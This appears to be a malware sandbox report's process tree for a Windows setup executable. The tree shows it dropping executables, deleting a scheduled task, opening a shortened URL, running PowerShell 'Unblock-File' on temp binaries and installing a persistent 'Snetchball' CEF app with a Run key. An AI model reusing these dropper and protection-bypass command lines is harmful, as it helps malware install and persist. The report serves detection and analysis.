C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1904 /prefetch:22⤵PID:3516
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:3628 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2740 /prefetch:82⤵PID:2120
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1888 /prefetch:12⤵PID:5876
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:12⤵PID:2200
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5596 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:380 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5368 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5164 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4552 /prefetch:12⤵PID:1800
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:12⤵PID:4908
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:12⤵PID:5888
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:12⤵PID:976
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5976 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:3048 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:12⤵PID:1936
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6232 /prefetch:12⤵PID:5396
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6652 /prefetch:12⤵PID:1912
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:12⤵PID:2488
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5256 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:2084 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:12⤵PID:3184
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaService --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=6476 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:6048
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5168
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4048
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4056
-
C:\Users\Admin\Desktop\setup_34Uv1hLE7B.exe"C:\Users\Admin\Desktop\setup_34Uv1hLE7B.exe"1⤵PID:4000
-
C:\Users\Admin\AppData\Local\Temp\is-TTMLS.tmp\setup_34Uv1hLE7B.tmp"C:\Users\Admin\AppData\Local\Temp\is-TTMLS.tmp\setup_34Uv1hLE7B.tmp" /SL5="$7020E,6120275,56832,C:\Users\Admin\Desktop\setup_34Uv1hLE7B.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:6088 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "dj_minor_adequate_7161"3⤵PID:5240
-
C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe"C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe" 1711397ec0a91dd980a7244b5bb3ba843⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5828 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 8444⤵
- Program crash
PID:960 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 8524⤵
- Program crash
PID:3688 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 9164⤵
- Program crash
PID:1916 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 10484⤵
- Program crash
PID:1712 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 10684⤵
- Program crash
PID:1184 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 10524⤵
- Program crash
PID:4752 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 11404⤵
- Program crash
PID:4868 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 11484⤵
- Program crash
PID:716 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 11844⤵
- Program crash
PID:5448 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 11924⤵
- Program crash
PID:5516 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 9684⤵
- Program crash
PID:1076 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 11404⤵
- Program crash
PID:3504 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 11964⤵
- Program crash
PID:5156 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 12924⤵
- Program crash
PID:1868 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 11964⤵
- Program crash
PID:5296 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 18804⤵
- Program crash
PID:4832 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 20564⤵
- Program crash
PID:5420 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://clck.ru/3Bsi4L4⤵PID:5576
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffd200c3cb8,0x7ffd200c3cc8,0x7ffd200c3cd85⤵PID:4860
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 17644⤵
- Program crash
PID:4952 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 18524⤵
- Program crash
PID:4940 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 18844⤵
- Program crash
PID:5672 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 18164⤵
- Program crash
PID:4080 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 17604⤵
- Program crash
PID:2408 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 18244⤵
- Program crash
PID:3444 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 19484⤵
- Program crash
PID:3436 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 20564⤵
- Program crash
PID:5884 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 20884⤵
- Program crash
PID:756 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 19284⤵
- Program crash
PID:580 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 21364⤵
- Program crash
PID:3140 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 21844⤵
- Program crash
PID:4640 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 22204⤵
- Program crash
PID:4212 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 22044⤵
- Program crash
PID:1596 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 21604⤵
- Program crash
PID:1712 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 21564⤵
- Program crash
PID:3060 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 22004⤵
- Program crash
PID:5752 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 22164⤵
- Program crash
PID:1436 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 22484⤵
- Program crash
PID:1212 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 22084⤵
- Program crash
PID:4228 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 21164⤵
- Program crash
PID:864 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\XY5cJ0q5\TVCwEHwXmrhkdZhEKh.exe"4⤵PID:4524
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\XY5cJ0q5\TVCwEHwXmrhkdZhEKh.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4144 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 21484⤵
- Program crash
PID:1240 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\13hJfDS0\07FQtEghQ.exe"4⤵PID:5540
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\13hJfDS0\07FQtEghQ.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1868 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\h2jPqaN0\bSWFf7XkEILq.exe"4⤵PID:480
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\h2jPqaN0\bSWFf7XkEILq.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2028 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 21324⤵
- Program crash
PID:5628 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 19244⤵
- Program crash
PID:5132 -
C:\Users\Admin\AppData\Local\Temp\13hJfDS0\07FQtEghQ.exeC:\Users\Admin\AppData\Local\Temp\13hJfDS0\07FQtEghQ.exe /sid=3 /pid=10904⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3576 -
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:2276 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exeC:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Modifies Control Panel
PID:3584 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Mobile Safari/537.36 EdgA/126.0.0.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2768 --field-trial-handle=2788,i,13110437522955544465,15093982557072828237,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:27⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5692 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Mobile Safari/537.36 EdgA/126.0.0.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2976 --field-trial-handle=2788,i,13110437522955544465,15093982557072828237,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:87⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5604 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Mobile Safari/537.36 EdgA/126.0.0.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2988 --field-trial-handle=2788,i,13110437522955544465,15093982557072828237,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:87⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1948 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Mobile Safari/537.36 EdgA/126.0.0.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3136 --field-trial-handle=2788,i,13110437522955544465,15093982557072828237,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:17⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5192 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Mobile Safari/537.36 EdgA/126.0.0.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3144 --field-trial-handle=2788,i,13110437522955544465,15093982557072828237,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:17⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3832 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
- Drops file in Windows directory
- Modifies Control Panel
PID:3176 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2880 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:29⤵
- Executes dropped EXE
PID:940 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3124 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:89⤵
- Executes dropped EXE
PID:2636 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3128 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:89⤵
- Executes dropped EXE
PID:3896 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3148 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:6048 -
